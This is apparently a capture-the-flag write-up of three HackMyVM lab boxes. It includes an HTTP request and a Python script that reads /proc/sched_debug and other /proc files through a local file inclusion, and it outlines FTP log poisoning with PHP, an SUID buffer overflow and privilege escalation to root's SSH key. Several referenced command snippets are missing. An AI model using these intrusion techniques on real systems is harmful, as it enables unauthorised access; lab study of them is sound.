I’ve done a few more HackMyVM boxes: Superhuman, Brain and Eyes. Superhuman and Brain were Easy rated, Eyes is Medium.
Superhuman was essentially weaponised guessing, followed by a GTFOBins privesc (I think; I didn’t take notes). The only interesting (?) command was this one:
Also, I guess ciphey was actually useful, which tbh was a first for me:
Brain was an LFI to obtain a password for the foothold, then connecting to an internal service to get another password for the privesc. The only interesting part was that the file to include was /proc/sched_debug, which doesn’t appear in the standard SecLists LFI wordlists. It lists every task on the box by name and PID, so it’s a cheap way to spot an internal service without guessing filenames on disk:
GET /brainstorm/file.php?file=/proc/sched_debug HTTP/1.1
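As an added example (not part of the original write-up), the script below does the two things that made /proc/sched_debug useful here: it builds the include URL for a few /proc paths that generic LFI wordlists miss, and it parses the sched_debug task table into name-to-PID pairs so the process of interest stands out. The target URL and parameter name, and the sched_debug excerpt, are constructed for offline use; the network helper is only called if you point it at a real box.

```python
"""Enumerate running processes through an LFI by including /proc/sched_debug.

Added example, not code from the original write-up. Assumes a PHP-style
include such as /brainstorm/file.php?file=<path>; the host is a placeholder
and SAMPLE_SCHED_DEBUG is constructed so the parser can be run offline.
"""
import re
import urllib.parse
import urllib.request
from typing import Dict, List

# /proc entries that rarely appear in generic LFI wordlists but leak
# process names, environment and listening sockets without filename guessing.
PROC_PATHS = [
    "/proc/sched_debug",      # name and PID of every task on the box
    "/proc/self/cmdline",     # how the web server process was started
    "/proc/self/environ",     # its environment (paths, sometimes secrets)
    "/proc/net/tcp",          # listening sockets, including localhost-only ones
]

# Constructed excerpt in the layout of 4.x/5.x kernels (a one-letter state
# column, then task name, PID and scheduler statistics; older kernels omit
# the state column, which the regex below treats as optional).
SAMPLE_SCHED_DEBUG = """\
Sched Debug Version: v0.11, 5.4.0-65-generic #73-Ubuntu
ktime                                   : 1234567.890123

cpu#0, 2400.000 MHz
  .nr_running                    : 1

runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-------------------------------------------------------------------------------------------------------------
 S        systemd     1       532.128847      5423   120         0.000000       899.140301         0.000000 0 0 /init.scope
 S       kthreadd     2      3810.414211       146   120         0.000000         3.112893         0.000000 0 0 /
 S         vsftpd   612       921.228111        31   120         0.000000         1.983214         0.000000 0 0 /system.slice/vsftpd.service
 S        apache2   701      1032.877414       210   120         0.000000        22.114312         0.000000 0 0 /system.slice/apache2.service
 S        apache2   702      1032.900114       198   120         0.000000        21.003412         0.000000 0 0 /system.slice/apache2.service
>R        python3   845      1050.112847       512   120         0.000000       105.201100         0.000000 0 0 /system.slice/brainstorm.service
"""

# A task row: optional state (">R" marks the running task), task name,
# numeric PID, then at least one statistics column. Header and separator
# rows have no numeric PID column, so they never match.
TASK_LINE = re.compile(r"^\s*(?:>?[A-Z]\s+)?(\S+)\s+(\d+)\s+\S+\s")


def parse_sched_debug(text: str) -> Dict[str, List[int]]:
    """Map each task name to the PIDs running under it.

    The 'runnable tasks:' table is repeated once per CPU, so parsing stops
    at the next 'cpu#' header and PIDs are de-duplicated across tables.
    """
    tasks: Dict[str, List[int]] = {}
    in_table = False
    for line in text.splitlines():
        if line.strip() == "runnable tasks:":
            in_table = True
            continue
        if line.startswith("cpu#"):
            in_table = False
            continue
        if not in_table:
            continue
        m = TASK_LINE.match(line)
        if m:
            name, pid = m.group(1), int(m.group(2))
            pids = tasks.setdefault(name, [])
            if pid not in pids:
                pids.append(pid)
    return tasks


def lfi_url(base: str, param: str, path: str) -> str:
    """Build the include URL; '/' is left unencoded to mirror the raw request."""
    return f"{base}?{param}={urllib.parse.quote(path, safe='/')}"


def fetch_via_lfi(base: str, param: str, path: str, timeout: float = 10.0) -> str:
    """Fetch a file through the include. Network call: not used offline."""
    with urllib.request.urlopen(lfi_url(base, param, path), timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    # Offline demo on the constructed sample; against a real target you would
    # call parse_sched_debug(fetch_via_lfi(base, "file", "/proc/sched_debug")).
    base = "http://10.0.0.5/brainstorm/file.php"      # placeholder host
    for path in PROC_PATHS:
        print("would request:", lfi_url(base, "file", path))
    for name, pids in sorted(parse_sched_debug(SAMPLE_SCHED_DEBUG).items()):
        print(f"{name:<10} {pids}")
```

The payoff is the task list: an application process such as the python3 task here, that is not a web server or a kernel thread, is the hint to look for a local port (cross-check with /proc/net/tcp) or a config file under its working directory.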
Eyes was another LFI, but this time an anonymous FTP server gave us the LFI parameter straight up, so no fuzzing was required. There was no write access to FTP.
What’s in the file?
So we have a username, and in any case we can include /etc/passwd to confirm it. Monica doesn’t have an SSH key (spoiler alert), so we couldn’t read it even if we had permission, which we don’t. We can include /var/log/vsftpd.log, though, and since vsftpd writes the username from every login attempt into that log, we can poison it with PHP:
This was the most interesting part. We have an SUID binary at /opt/ls, along with some C code and a note (the note says something about creating a new version of ls).
So here we have the ability to overflow:
So now just change the last ‘id’ to ‘sh’ and get a shell. Privesc is GTFOBins:
This gives us a privileged read, and root has an SSH key: